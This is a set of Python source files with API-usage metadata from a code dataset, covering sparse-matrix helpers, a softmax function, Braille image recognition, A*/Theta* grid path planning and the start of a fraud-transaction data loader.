A.matvec_transp(v, innerprod)
else:
raise TypeError("innerprodtranspose(A,v) requires that v be "
"a vector (rank-1 dense array) if A is sparse.")
return innerprod
elif scipy.sparse.isspmatrix(A):
return (A.conj().transpose() * v).transpose()
else:
# Assume A is dense
if isinstance(v, np.ndarray):
# v is also dense
if len(v.shape) == 1:
# We can't transpose a rank-1 matrix into a row vector, so
# we reshape it.
vm = v.shape[0]
vcolumn = np.reshape(v, (1, vm))
x = np.dot(vcolumn, A)
return np.reshape(x, (n,))
else:
#(vm, vn) = v.shape
# Assume vm == m
x = np.dot(np.transpose(v), A)
return np.transpose(x)
else:
raise TypeError("unsupported types for inner product")
def rowmeans(A):
"""
This is a wrapper for general dense or sparse dot products.
It is only necessary as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (m x 1) vector representing the mean of the rows of A,
which be an (m x n) sparse or dense matrix.
>>> a = np.array([[1,2],[3,4]], float)
>>> rowmeans(a)
array([ 1.5, 3.5])
"""
if type(A) is np.ndarray:
return A.mean(1)
else:
# Assume it's sparse
try:
n = A.shape[1]
except AttributeError:
raise TypeError("rowmeans() only works with sparse and dense "
"arrays")
rowsum = innerprod(A, np.ones(n, float))
return rowsum / float(n)
def columnmeans(A):
"""
This is a wrapper for general dense or sparse dot products.
It is only necessary as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (1 x n) vector with the column averages of A, which can
be an (m x n) sparse or dense matrix.
>>> a = np.array([[1,2],[3,4]],'d')
>>> columnmeans(a)
array([ 2., 3.])
"""
if type(A) is np.ndarray:
return A.mean(0)
else:
# Assume it's sparse
try:
m = A.shape[0]
except AttributeError:
raise TypeError("columnmeans() only works with sparse and dense "
"arrays")
columnsum = innerprodtranspose(A, np.ones(m, float))
return columnsum / float(m)
def columnvariances(A):
"""
This is a wrapper for general dense or sparse dot products.
It is not necessary except as a common interface for supporting ndarray,
scipy spmatrix, and PySparse arrays.
Returns a dense (1 x n) vector with unbiased estimators for the column
variances for each column of the (m x n) sparse or dense matrix A. (The
normalization is by (m - 1).)
>>> a = np.array([[1,2], [3,4]], 'd')
>>> columnvariances(a)
array([ 2., 2.])
"""
if type(A) is np.ndarray:
return np.std(A,0)**2
else:
try:
m = A.shape[0]
except AttributeError:
raise TypeError("columnvariances() only works with sparse "
"and dense arrays")
means = columnmeans(A)
return columnmeans((A-means)**2) * (m/(m-1.0))
def flatten(a):
"""Flattens the sparse matrix or dense array/matrix 'a' into a
1-dimensional array
"""
if scipy.sparse.isspmatrix(a):
return a.A.flatten()
else:
return np.asarray(a).flatten()
class DivergenceError(Exception):
"""Exception raised if the entropy dual has no finite minimum.
"""
def __init__(self, message):
self.message = message
Exception.__init__(self)
def __str__(self):
return repr(self.message)
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
[
"math.exp",
"numpy.log",
"numpy.std",
"numpy.empty",
"numpy.asarray",
"cmath.log",
"numpy.transpose",
"numpy.ones",
"numpy.arange",
"numpy.array",
"numpy.reshape",
"cmath.exp",
"numpy.dot",
"math.log",
"builtins.range",
"doctest.testmod"
] |
[((3174, 3199), 'numpy.empty', 'np.empty', (['n'], {'dtype': 'object'}), '(n, dtype=object)\n', (3182, 3199), True, 'import numpy as np\n'), ((6991, 7002), 'math.log', 'math.log', (['s'], {}), '(s)\n', (6999, 7002), False, 'import math\n'), ((25128, 25145), 'doctest.testmod', 'doctest.testmod', ([], {}), '()\n', (25143, 25145), False, 'import doctest\n'), ((3126, 3138), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (3135, 3138), True, 'import numpy as np\n'), ((6968, 6979), 'math.exp', 'math.exp', (['x'], {}), '(x)\n', (6976, 6979), False, 'import math\n'), ((18779, 18794), 'numpy.array', 'np.array', (['[0.0]'], {}), '([0.0])\n', (18787, 18794), True, 'import numpy as np\n'), ((7255, 7267), 'cmath.log', 'cmath.log', (['x'], {}), '(x)\n', (7264, 7267), False, 'import cmath\n'), ((7293, 7304), 'math.log', 'math.log', (['x'], {}), '(x)\n', (7301, 7304), False, 'import math\n'), ((7541, 7553), 'math.log', 'math.log', (['xi'], {}), '(xi)\n', (7549, 7553), False, 'import math\n'), ((9588, 9596), 'builtins.range', 'range', (['k'], {}), '(k)\n', (9593, 9596), False, 'from builtins import range\n'), ((11566, 11583), 'numpy.reshape', 'np.reshape', (['xs', 'n'], {}), '(xs, n)\n', (11576, 11583), True, 'import numpy as np\n'), ((11781, 11810), 'numpy.empty', 'np.empty', (['(m, n)'], {'dtype': 'dtype'}), '((m, n), dtype=dtype)\n', (11789, 11810), True, 'import numpy as np\n'), ((12109, 12117), 'builtins.range', 'range', (['n'], {}), '(n)\n', (12114, 12117), False, 'from builtins import range\n'), ((17811, 17834), 'numpy.empty', 'np.empty', (['(n, m)', 'float'], {}), '((n, m), float)\n', (17819, 17834), True, 'import numpy as np\n'), ((19003, 19015), 'numpy.dot', 'np.dot', (['u', 'v'], {}), '(u, v)\n', (19009, 19015), True, 'import numpy as np\n'), ((21164, 21182), 'numpy.empty', 'np.empty', (['n', 'float'], {}), '(n, float)\n', (21172, 21182), True, 'import numpy as np\n'), ((22896, 22913), 'numpy.ones', 'np.ones', (['n', 'float'], {}), '(n, float)\n', (22903, 22913), True, 'import numpy as np\n'), ((23691, 23708), 'numpy.ones', 'np.ones', (['m', 'float'], {}), '(m, float)\n', (23698, 23708), True, 'import numpy as np\n'), ((24295, 24307), 'numpy.std', 'np.std', (['A', '(0)'], {}), '(A, 0)\n', (24301, 24307), True, 'import numpy as np\n'), ((3509, 3528), 'numpy.log', 'np.log', (['sampleprobs'], {}), '(sampleprobs)\n', (3515, 3528), True, 'import numpy as np\n'), ((7657, 7670), 'cmath.log', 'cmath.log', (['xi'], {}), '(xi)\n', (7666, 7670), False, 'import cmath\n'), ((19896, 19908), 'numpy.dot', 'np.dot', (['A', 'v'], {}), '(A, v)\n', (19902, 19908), True, 'import numpy as np\n'), ((20199, 20217), 'numpy.empty', 'np.empty', (['m', 'float'], {}), '(m, float)\n', (20207, 20217), True, 'import numpy as np\n'), ((24802, 24815), 'numpy.asarray', 'np.asarray', (['a'], {}), '(a)\n', (24812, 24815), True, 'import numpy as np\n'), ((6501, 6521), 'cmath.exp', 'cmath.exp', (['(a_i - b_i)'], {}), '(a_i - b_i)\n', (6510, 6521), False, 'import cmath\n'), ((6661, 6681), 'cmath.exp', 'cmath.exp', (['(b_i - a_i)'], {}), '(b_i - a_i)\n', (6670, 6681), False, 'import cmath\n'), ((21804, 21826), 'numpy.reshape', 'np.reshape', (['v', '(1, vm)'], {}), '(v, (1, vm))\n', (21814, 21826), True, 'import numpy as np\n'), ((21847, 21865), 'numpy.dot', 'np.dot', (['vcolumn', 'A'], {}), '(vcolumn, A)\n', (21853, 21865), True, 'import numpy as np\n'), ((21889, 21908), 'numpy.reshape', 'np.reshape', (['x', '(n,)'], {}), '(x, (n,))\n', (21899, 21908), True, 'import numpy as np\n'), ((22066, 22081), 'numpy.transpose', 'np.transpose', (['x'], {}), '(x)\n', (22078, 22081), True, 'import numpy as np\n'), ((22023, 22038), 'numpy.transpose', 'np.transpose', (['v'], {}), '(v)\n', (22035, 22038), True, 'import numpy as np\n')]
|
import numpy as np
def softmax(x, axis=None):
max = np.max(x,axis=axis,keepdims=True)
e_x = np.exp(x - max)
sum = np.sum(e_x,axis=axis,keepdims=True)
f_x = e_x / sum
return f_x
|
[
"numpy.max",
"numpy.sum",
"numpy.exp"
] |
[((57, 92), 'numpy.max', 'np.max', (['x'], {'axis': 'axis', 'keepdims': '(True)'}), '(x, axis=axis, keepdims=True)\n', (63, 92), True, 'import numpy as np\n'), ((101, 116), 'numpy.exp', 'np.exp', (['(x - max)'], {}), '(x - max)\n', (107, 116), True, 'import numpy as np\n'), ((127, 164), 'numpy.sum', 'np.sum', (['e_x'], {'axis': 'axis', 'keepdims': '(True)'}), '(e_x, axis=axis, keepdims=True)\n', (133, 164), True, 'import numpy as np\n')]
|
import cv2
import numpy as np
import statistics as stat
class optical_braille_recognition():
def __init__(self) -> None:
pass
def make_histogram_y(self, img):
'''
Organiza os dados da projeção horizontal na imagem
Entrada:
img -> Array da imagem
Saída:
hist -> Array com os valores do histograma de projeção horizontal
'''
height, width = img.shape
hist = np.zeros(height)
for x in range(height):
for y in range(width):
if (img[x][y] == 1):
hist[x] += 1
return hist
def make_histogram_x(self, img):
'''
Organiza os dados da projeção vertical na imagem, essa projeção só pode ser
feita se a imagem de entrada possuir apenas uma única linha de caracteres
braiile
Entrada:
img -> Array da imagem
Saída:
hist -> Array com os valores do histograma de projeção vertical
'''
height, width = img.shape
hist = np.zeros(width)
for x in range(height):
for y in range(width):
if (img[x][y] == 1):
hist[y] += 1
return hist
def get_delimiters(self, hist):
'''
Encontra os delimitadores verticais e horizontais da posição onde se
encontram os pontos dos caracteres braille por meio do histograma
Entrada:
hist --> Array com os valores do histograma
Saída:
delimiters --> Array com os delimitadores de posição dos pontos
'''
delimiters = list()
for i in range(1, len(hist)-1):
if (hist[i] > 0) and (hist[i-1] == 0) and (hist[i+1] > 0):
delimiters.append(i-1)
if (hist[i] > 0) and (hist[i-1] > 0) and (hist[i+1] == 0):
delimiters.append(i+1)
return delimiters
def get_line_delimiters(self, delimiters):
'''
Encontra os delimitadores que determinam onde começam e onde terminam
as linhas de texto braille da imagem
Entrada:
delimiters --> Array com os delimitadores de posição dos pontos
Saída:
line_delimiters --> Array com os delimitadores de linha
'''
distances = list()
for i in range(len(delimiters)-1):
distances.append(delimiters[i+1] - delimiters[i])
# print(f"{delimiters[i+1]} - {delimiters[i]}", end='\n')
distances = np.array(distances)
# print(distances)
min = distances.min() # Distância entre linhas de pontos de um mesmo caractere
mode = stat.mode(distances) # Diâmetro dos pontos
# print(mode)
if (mode - min) > 2:
limiar = min+2
else:
limiar = min+1
line_delimiters = list()
for i in range(1, len(delimiters)-2):
if (distances[i] > mode and distances[i+1] > limiar and distances[i-1] > limiar):
line_delimiters.append(delimiters[i])
line_delimiters.append(delimiters[i+1])
if i-1 == 0:
line_delimiters.append(delimiters[i-1])
if i+1 == len(delimiters)-2:
line_delimiters.append(delimiters[i+2])
return line_delimiters
def get_character_delimiters(self, delimiters):
'''
Utiliza os delimitadores de posição para determinar os delimitadores dos
caracteres braille por meio do cálculo de suas distâncias
Entrada:
delimiters --> Array com os delimitadores de posição dos pontos
Saída:
character_delimiters --> Array com os delimitadores dos caracteres
'''
distances = list()
for i in range(len(delimiters)-1):
distances.append(delimiters[i+1] - delimiters[i])
# print(f"{delimiters[i+1]} - {delimiters[i]}", end='\n')
distances = np.array(distances)
min = distances.min()
mode=stat.mode(distances)
if (mode - min) > 2:
limiar = min+2
else:
limiar = min+1
# print(limiar)
# print(distances)
character_delimiters = list()
for i in range(len(delimiters)-1):
# Delimitando os caracters que possuem pontos nas duas colunas
diameter = mode
if (distances[i] <= limiar and distances[i] != mode-1 ):
if i != 0:
diameter = delimiters[i] - delimiters[i-1]
character_delimiters.append(delimiters[i] - diameter)
character_delimiters.append(delimiters[i+1] + diameter)
#Delimitando os caracteres de início e final de linha
elif i == 0 and distances[i+1] > limiar:
# Caso em que o caractere possui pontos apenas na coluna da esquerda
if (distances[i+1] > mode+limiar):
character_delimiters.append(delimiters[i+1] + min + mode)
character_delimiters.append(delimiters[i])
# Caso em que o caractere possui pontos apenas na coluna da direita
else:
character_delimiters.append(delimiters[i] - min - mode)
character_delimiters.append(delimiters[i+1])
elif (i == len(distances)-1) and distances[i-1] > limiar:
# Caso em que o caractere possui pontos apenas na coluna da direita
if (distances[i-1] > mode+limiar and distances[i-3] > limiar):
character_delimiters.append(delimiters[i-1] - min - mode)
character_delimiters.append(delimiters[i])
# Caso em que o caractere possui pontos apenas na coluna da esquerda
else:
character_delimiters.append(delimiters[i+1] + min + mode)
character_delimiters.append(delimiters[i])
# Delimitando os caracteres que possuem pontos apenas na coluna da esquerda
if (distances[i] > 1.5*mode+min):
if i > 1 and distances[i-2] > limiar:
character_delimiters.append(delimiters[i] + min + mode)
character_delimiters.append(delimiters[i-1])
# Delimitando os caracteres que possuem pontos apenas na coluna da direita
elif ((distances[i] > 1.5*mode+min) and (i < len(delimiters)-3) and
(distances[i+2] > limiar)):
# if (i < len(delimiters_x)-3) and distances[i+2] > min+1:
character_delimiters.append(delimiters[i+2])
character_delimiters.append(delimiters[i+1] - min - mode)
# elif i == len(delimiters)-2:
# character_delimiters.append(delimiters[i+2])
# character_delimiters.append(delimiters[i+1] - min - mode)
# Delimitando os caracteres de espaço em branco
if (distances[i] >= 3*mode+min):
character_delimiters.append(delimiters[i] + mode)
character_delimiters.append(delimiters[i+1] - mode)
return character_delimiters
def get_line_subimages(self, img, line_delimiters):
'''
Utiliza os delimitadores de linha para recortar a imagem em subimagens, cada
uma com uma linha de carateres braille
Entrada:
img -> Array da imagem que será recortada
line_delimiters --> Array com os delimitadores de linha
Saída:
line_subimages --> Array com subimagens das linhas recortadas
'''
line_delimiters = sorted(line_delimiters)
line_subimages = list()
for i in range(len(line_delimiters)//2):
line_subimages.append(img[line_delimiters[2*i]:line_delimiters[2*i+1],:])
return line_subimages
def get_character_subimages(self, img, char_delimiters):
'''
Recorta a imagem que contém uma linha de caracteres braille em subimagens
contendo os caracteres, que por sua vez são armazenadas em um array na ordem
de leitura
Entrada:
img --> Array da imagem contendo um linha de caracteres
char_delimiters --> Array com os delimitadores dos caracteres
Saída:
subimages --> Array com as subimagens dos caracteres
'''
char_delimiters = sorted(char_delimiters)
for i in range(len(char_delimiters)):
if char_delimiters[i] < 0:
char_delimiters[i] = 0
char_subimages = list()
for i in range(len(char_delimiters)//2):
char_subimages.append(img[:,char_delimiters[2*i]:char_delimiters[2*i+1]])
return char_subimages
def optical_braille_recognition(self, img):
'''
Recebe uma imagem pré-processada contendo um texto em braille, detecta a
posição desses caracters na imagem e apartir disso obtem uma matriz de
subimagens contendo uma palavra do texto em cada linha
Entrada:
img --> Array da imagem pré-processada
Saída:
subimages --> matriz de subimagens, onde cada linha possui os caracteres de
uma palavra
'''
hist_y = self.make_histogram_y(img)
delimiters_y = self.get_delimiters(hist_y)
line_delimiters = self.get_line_delimiters(delimiters_y)
line_subimages = self.get_line_subimages(img, line_delimiters)
subimages = list()
for i in range(len(line_subimages)):
hist_x = self.make_histogram_x(line_subimages[i])
delimiters_x = self.get_delimiters(hist_x)
char_delimiters = self.get_character_delimiters(delimiters_x)
char_subimages = self.get_character_subimages(line_subimages[i], char_delimiters)
word_subimages = list()
for j in range(len(char_subimages)):
hist_x = self.make_histogram_x(char_subimages[j])
if np.max(hist_x) != 0:
word_subimages.append(char_subimages[j])
else:
subimages.append(word_subimages)
word_subimages = list()
if np.max(hist_x) != 0 and j == len(char_subimages)-1:
subimages.append(word_subimages)
word_subimages = list()
return subimages
def tilt_correction(self, img):
max = 0
rows, cols = img.shape
for theta in np.arange(-6, 6, 0.1):
Mr = cv2.getRotationMatrix2D( (cols/2, rows/2), theta , 1)
aux_img = cv2.warpAffine(img, Mr, (cols, rows))
hist_y = self.make_histogram_y(aux_img)
delimiters_y = self.get_delimiters(hist_y)
if len(delimiters_y) > max:
max = len(delimiters_y)
dst_img = aux_img
return dst_img
|
[
"numpy.zeros",
"cv2.warpAffine",
"numpy.max",
"numpy.array",
"numpy.arange",
"statistics.mode",
"cv2.getRotationMatrix2D"
] |
[((467, 483), 'numpy.zeros', 'np.zeros', (['height'], {}), '(height)\n', (475, 483), True, 'import numpy as np\n'), ((1098, 1113), 'numpy.zeros', 'np.zeros', (['width'], {}), '(width)\n', (1106, 1113), True, 'import numpy as np\n'), ((2554, 2573), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (2562, 2573), True, 'import numpy as np\n'), ((2704, 2724), 'statistics.mode', 'stat.mode', (['distances'], {}), '(distances)\n', (2713, 2724), True, 'import statistics as stat\n'), ((3992, 4011), 'numpy.array', 'np.array', (['distances'], {}), '(distances)\n', (4000, 4011), True, 'import numpy as np\n'), ((4055, 4075), 'statistics.mode', 'stat.mode', (['distances'], {}), '(distances)\n', (4064, 4075), True, 'import statistics as stat\n'), ((10651, 10672), 'numpy.arange', 'np.arange', (['(-6)', '(6)', '(0.1)'], {}), '(-6, 6, 0.1)\n', (10660, 10672), True, 'import numpy as np\n'), ((10691, 10746), 'cv2.getRotationMatrix2D', 'cv2.getRotationMatrix2D', (['(cols / 2, rows / 2)', 'theta', '(1)'], {}), '((cols / 2, rows / 2), theta, 1)\n', (10714, 10746), False, 'import cv2\n'), ((10768, 10805), 'cv2.warpAffine', 'cv2.warpAffine', (['img', 'Mr', '(cols, rows)'], {}), '(img, Mr, (cols, rows))\n', (10782, 10805), False, 'import cv2\n'), ((10107, 10121), 'numpy.max', 'np.max', (['hist_x'], {}), '(hist_x)\n', (10113, 10121), True, 'import numpy as np\n'), ((10348, 10362), 'numpy.max', 'np.max', (['hist_x'], {}), '(hist_x)\n', (10354, 10362), True, 'import numpy as np\n')]
|
import heapq as hq
import math
import numpy as np
from models.geometry_utils import *
# TODO: Generalize to 3D?
class Node:
def __init__(self, pos, parent=None, g_cost=math.inf, f_cost=math.inf):
self.pos = pos
self.parent = parent
self.g_cost = g_cost
self.f_cost = f_cost
def __eq__(self, other):
return all(self.pos == other.pos)
def __le__(self, other):
if self.pos[0] == other.pos[0]:
return self.pos[1] <= other.pos[1]
else:
return self.pos[0] <= other.pos[0]
def __lt__(self, other):
if self.pos[0] == other.pos[0]:
return self.pos[1] < other.pos[1]
else:
return self.pos[0] < other.pos[0]
# TODO: Generalize to 3D
class GridMap:
# cell_size > 0; don't make cell_size too small
def __init__(self, bounds=((0.0, 0.0), (10.0, 10.0)), cell_size=0.1, quad=True):
self.bounds = bounds
self.cell_size = cell_size
self.quad = quad
self.Nx = math.ceil((bounds[1][0] - bounds[0][0]) / cell_size)
self.Ny = math.ceil((bounds[1][1] - bounds[0][1]) / cell_size)
pos = lambda i, j: np.array([bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) * cell_size])
self.grid = [[Node(pos(i, j)) for j in range(self.Ny)] for i in range(self.Nx)]
# pos should be within bounds
def set_node(self, pos, parent, g_cost, f_cost):
i_x = math.floor((pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((pos[1] - self.bounds[0][1]) / self.cell_size)
self.grid[i_x][i_y].parent = parent
self.grid[i_x][i_y].g_cost = g_cost
self.grid[i_x][i_y].f_cost = f_cost
return self.grid[i_x][i_y]
# pos should be within bounds
def get_node(self, pos):
i_x = math.floor((pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((pos[1] - self.bounds[0][1]) / self.cell_size)
return self.grid[i_x][i_y]
def get_neighbours(self, node):
i_x = math.floor((node.pos[0] - self.bounds[0][0]) / self.cell_size)
i_y = math.floor((node.pos[1] - self.bounds[0][1]) / self.cell_size)
neighbours = []
for i in range(i_x - 1, i_x + 2):
for j in range(i_y - 1, i_y + 2):
if i == i_x and j == i_y:
continue
if self.quad:
if 0 <= i <= self.Nx - 1 and 0 <= j <= self.Ny - 1 and abs(i - i_x) + abs(j - i_y) <= 1:
neighbours.append(self.grid[i][j])
else:
if 0 <= i <= self.Nx - 1 and 0 <= j <= self.Ny - 1:
neighbours.append(self.grid[i][j])
return neighbours
class GraphSearch:
def __init__(self, graph, obstacles, margin):
self.graph = graph
self.obstacles = obstacles
self.margin = margin
def a_star(self, start_pos, goal_pos):
h_cost = lambda pos: np.linalg.norm(goal_pos - pos)
edge_cost = lambda n1, n2: np.linalg.norm(n1.pos - n2.pos)
openSet = []
start = self.graph.set_node(start_pos, None, 0.0, h_cost(start_pos))
goal = self.graph.get_node(goal_pos)
hq.heappush(openSet, (start.f_cost, start))
while len(openSet) > 0:
current = openSet[0][1]
if current == goal:
return self.reconstruct_path(current)
hq.heappop(openSet)
for n in self.graph.get_neighbours(current):
if self.check_collision(n.pos):
continue
g_score = current.g_cost + edge_cost(current, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current, g_score, g_score + h_cost(n.pos))
if not n in (x[1] for x in openSet):
hq.heappush(openSet, (n_.f_cost, n_))
return []
def theta_star(self, start_pos, goal_pos):
h_cost = lambda pos: np.linalg.norm(goal_pos - pos)
edge_cost = lambda n1, n2: np.linalg.norm(n1.pos - n2.pos)
openSet = []
start = self.graph.set_node(start_pos, None, 0.0, h_cost(start_pos))
goal = self.graph.get_node(goal_pos)
hq.heappush(openSet, (start.f_cost, start))
while len(openSet) > 0:
current = openSet[0][1]
if current == goal:
return self.reconstruct_path(current)
hq.heappop(openSet)
for n in self.graph.get_neighbours(current):
if self.check_collision(n.pos):
continue
if (not current.parent is None) and self.line_of_sight(current.parent, n):
g_score = current.parent.g_cost + edge_cost(current.parent, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current.parent, g_score, g_score + h_cost(n.pos))
# delete n from min-heap
for i in range(len(openSet)):
if openSet[i][1] == n:
openSet[i] = openSet[-1]
openSet.pop()
if i < len(openSet):
hq._siftup(openSet, i)
hq._siftdown(openSet, 0, i)
break
hq.heappush(openSet, (n_.f_cost, n_))
else:
g_score = current.g_cost + edge_cost(current, n)
if g_score < n.g_cost:
n_ = self.graph.set_node(n.pos, current, g_score, g_score + h_cost(n.pos))
# delete n from min-heap
for i in range(len(openSet)):
if openSet[i][1] == n:
openSet[i] = openSet[-1]
openSet.pop()
if i < len(openSet):
hq._siftup(openSet, i)
hq._siftdown(openSet, 0, i)
break
hq.heappush(openSet, (n_.f_cost, n_))
return []
# TODO: optimize
def line_of_sight(self, n1, n2):
e = self.graph.cell_size
div = np.linalg.norm(n2.pos - n1.pos) / e
for i in range(1, math.floor(div) + 1):
if self.check_collision((n2.pos * i + n1.pos * (div - i)) / div):
return False
return True
def check_collision(self, pos):
for o in self.obstacles:
A, b = o.get_convex_rep()
b = b.reshape((len(b),))
if all(A @ pos - b - self.margin * np.linalg.norm(A, axis=1) <= 0):
return True
return False
def reconstruct_path(self, node):
path = [node]
while not node.parent is None:
node = node.parent
path.append(node)
return [path[len(path) - i - 1] for i in range(len(path))]
def reduce_path(self, path):
red_path = []
if len(path) > 1:
for i in range(1, len(path)):
if (not path[i].parent.parent is None) and self.line_of_sight(path[i], path[i].parent.parent):
path[i].parent = path[i].parent.parent
else:
red_path.append(path[i].parent)
red_path.append(path[-1])
return red_path
|
[
"heapq.heappush",
"math.ceil",
"math.floor",
"heapq.heappop",
"heapq._siftdown",
"heapq._siftup",
"numpy.array",
"numpy.linalg.norm"
] |
[((1065, 1117), 'math.ceil', 'math.ceil', (['((bounds[1][0] - bounds[0][0]) / cell_size)'], {}), '((bounds[1][0] - bounds[0][0]) / cell_size)\n', (1074, 1117), False, 'import math\n'), ((1137, 1189), 'math.ceil', 'math.ceil', (['((bounds[1][1] - bounds[0][1]) / cell_size)'], {}), '((bounds[1][1] - bounds[0][1]) / cell_size)\n', (1146, 1189), False, 'import math\n'), ((1502, 1559), 'math.floor', 'math.floor', (['((pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((pos[0] - self.bounds[0][0]) / self.cell_size)\n', (1512, 1559), False, 'import math\n'), ((1575, 1632), 'math.floor', 'math.floor', (['((pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((pos[1] - self.bounds[0][1]) / self.cell_size)\n', (1585, 1632), False, 'import math\n'), ((1886, 1943), 'math.floor', 'math.floor', (['((pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((pos[0] - self.bounds[0][0]) / self.cell_size)\n', (1896, 1943), False, 'import math\n'), ((1959, 2016), 'math.floor', 'math.floor', (['((pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((pos[1] - self.bounds[0][1]) / self.cell_size)\n', (1969, 2016), False, 'import math\n'), ((2107, 2169), 'math.floor', 'math.floor', (['((node.pos[0] - self.bounds[0][0]) / self.cell_size)'], {}), '((node.pos[0] - self.bounds[0][0]) / self.cell_size)\n', (2117, 2169), False, 'import math\n'), ((2185, 2247), 'math.floor', 'math.floor', (['((node.pos[1] - self.bounds[0][1]) / self.cell_size)'], {}), '((node.pos[1] - self.bounds[0][1]) / self.cell_size)\n', (2195, 2247), False, 'import math\n'), ((3323, 3366), 'heapq.heappush', 'hq.heappush', (['openSet', '(start.f_cost, start)'], {}), '(openSet, (start.f_cost, start))\n', (3334, 3366), True, 'import heapq as hq\n'), ((4381, 4424), 'heapq.heappush', 'hq.heappush', (['openSet', '(start.f_cost, start)'], {}), '(openSet, (start.f_cost, start))\n', (4392, 4424), True, 'import heapq as hq\n'), ((1220, 1310), 'numpy.array', 'np.array', (['[bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) * cell_size]'], {}), '([bounds[0][0] + (i + 0.5) * cell_size, bounds[0][1] + (j + 0.5) *\n cell_size])\n', (1228, 1310), True, 'import numpy as np\n'), ((3065, 3095), 'numpy.linalg.norm', 'np.linalg.norm', (['(goal_pos - pos)'], {}), '(goal_pos - pos)\n', (3079, 3095), True, 'import numpy as np\n'), ((3132, 3163), 'numpy.linalg.norm', 'np.linalg.norm', (['(n1.pos - n2.pos)'], {}), '(n1.pos - n2.pos)\n', (3146, 3163), True, 'import numpy as np\n'), ((3542, 3561), 'heapq.heappop', 'hq.heappop', (['openSet'], {}), '(openSet)\n', (3552, 3561), True, 'import heapq as hq\n'), ((4123, 4153), 'numpy.linalg.norm', 'np.linalg.norm', (['(goal_pos - pos)'], {}), '(goal_pos - pos)\n', (4137, 4153), True, 'import numpy as np\n'), ((4190, 4221), 'numpy.linalg.norm', 'np.linalg.norm', (['(n1.pos - n2.pos)'], {}), '(n1.pos - n2.pos)\n', (4204, 4221), True, 'import numpy as np\n'), ((4600, 4619), 'heapq.heappop', 'hq.heappop', (['openSet'], {}), '(openSet)\n', (4610, 4619), True, 'import heapq as hq\n'), ((6539, 6570), 'numpy.linalg.norm', 'np.linalg.norm', (['(n2.pos - n1.pos)'], {}), '(n2.pos - n1.pos)\n', (6553, 6570), True, 'import numpy as np\n'), ((6602, 6617), 'math.floor', 'math.floor', (['div'], {}), '(div)\n', (6612, 6617), False, 'import math\n'), ((3986, 4023), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', (3997, 4023), True, 'import heapq as hq\n'), ((5591, 5628), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', (5602, 5628), True, 'import heapq as hq\n'), ((6371, 6408), 'heapq.heappush', 'hq.heappush', (['openSet', '(n_.f_cost, n_)'], {}), '(openSet, (n_.f_cost, n_))\n', (6382, 6408), True, 'import heapq as hq\n'), ((6952, 6977), 'numpy.linalg.norm', 'np.linalg.norm', (['A'], {'axis': '(1)'}), '(A, axis=1)\n', (6966, 6977), True, 'import numpy as np\n'), ((5439, 5461), 'heapq._siftup', 'hq._siftup', (['openSet', 'i'], {}), '(openSet, i)\n', (5449, 5461), True, 'import heapq as hq\n'), ((5499, 5526), 'heapq._siftdown', 'hq._siftdown', (['openSet', '(0)', 'i'], {}), '(openSet, 0, i)\n', (5511, 5526), True, 'import heapq as hq\n'), ((6219, 6241), 'heapq._siftup', 'hq._siftup', (['openSet', 'i'], {}), '(openSet, i)\n', (6229, 6241), True, 'import heapq as hq\n'), ((6279, 6306), 'heapq._siftdown', 'hq._siftdown', (['openSet', '(0)', 'i'], {}), '(openSet, 0, i)\n', (6291, 6306), True, 'import heapq as hq\n')]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from os.path import join, dirname, exists
from os import makedirs, pardir
FOLDER_REAL_DATA = join(dirname(__file__), 'real_data')
FOLDER_SIMULATOR_INPUT = join(dirname(__file__), 'simulator_input')
FOLDER_REAL_DATA_ANALYSIS = join(FOLDER_REAL_DATA, 'analysis')
FOLDER_SIMULATOR_LOG = join(pardir, 'experiments/results')
# create the above folders if they don't exist yet
for folder in [FOLDER_REAL_DATA, FOLDER_SIMULATOR_INPUT, FOLDER_SIMULATOR_LOG, FOLDER_REAL_DATA_ANALYSIS]:
if not exists(folder):
makedirs(folder)
FILE_ANONYMIZED_DATASET = join(FOLDER_REAL_DATA, 'anonymized_dataset.csv')
FILE_REAL_LOG = join(FOLDER_REAL_DATA, 'transaction_log.csv')
FILE_SIMULATOR_LOG = join(FOLDER_SIMULATOR_LOG, 'transaction_log.csv')
def get_dataset(file):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param file:
:return:
"""
# get dataset from file
dataset01 = pd.read_csv(file)
# cast "date" column datetime objects
dataset01["Global_Date"] = pd.to_datetime(dataset01["Global_Date"])
dataset01["Local_Date"] = pd.to_datetime(dataset01["Local_Date"])
# for convenience split the dataset into non-fraud(0)/fraud(1)
dataset0 = dataset01[dataset01["Target"] == 0]
dataset1 = dataset01[dataset01["Target"] == 1]
# give the datasets names
dataset01.name = 'all'
dataset0.name = 'non-fraud'
dataset1.name = 'fraud'
return dataset01, dataset0, dataset1
def get_real_dataset():
file = join(FOLDER_REAL_DATA, 'transaction_log.csv')
return get_dataset(file)
def get_simulated_dataset(result_idx):
"""
Returns the dataset (full), and subsets for non-fraud and fraud only.
:param data_source: where data comes from, type: str, value: 'real' or 'simulator'
:return:
"""
file = join(FOLDER_SIMULATOR_LOG, '{}_transaction_log.csv'.format(result_idx))
return get_dataset(file)
def get_real_data_stats():
datasets = get_real_dataset()
return get_data_stats(datasets)
def get_simulated_data_stats(result_idx):
datasets = get_simulated_dataset(result_idx)
return get_data_stats(datasets)
def get_data_stats(datasets):
data_stats_cols = ['all', 'non-fraud', 'fraud']
data_stats = pd.DataFrame(columns=data_stats_cols)
